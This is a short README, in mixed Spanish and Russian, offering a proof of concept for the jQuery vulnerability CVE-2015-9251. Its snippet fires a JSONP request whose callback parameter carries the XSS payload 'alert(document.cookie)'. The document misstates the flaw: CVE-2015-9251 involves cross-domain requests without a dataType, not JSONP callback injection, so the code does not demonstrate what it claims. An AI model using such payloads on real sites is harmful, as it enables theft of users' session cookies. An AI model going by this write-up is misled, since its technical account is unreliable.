
PoC para CVE-2015-9251 jQuery menor a 3.0.0.
PoC для CVE-2015-9251 jQuery версий ниже 3.0.0.
Этот репозиторий содержит Proof of Concept (PoC) для уязвимости CVE-2015-9251 в библиотеке jQuery. Уязвимость позволяет атаку Cross-Site Scripting (XSS) через несанитизированные JSONP-вызовы, так как jQuery позволяет внедрение кода в параметр callback в версиях до 3.0.0.
CVE-2015-9251 затрагивает версии jQuery до 3.0.0. Уязвимость эксплуатируется путем манипуляции параметром callback в JSONP-запросе, что может позволить выполнение произвольного JavaScript-кода в браузере жертвы. Это может привести к раскрытию конфиденциальных данных, таких как сессионные куки.
Для выполнения PoC выполните следующие шаги:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>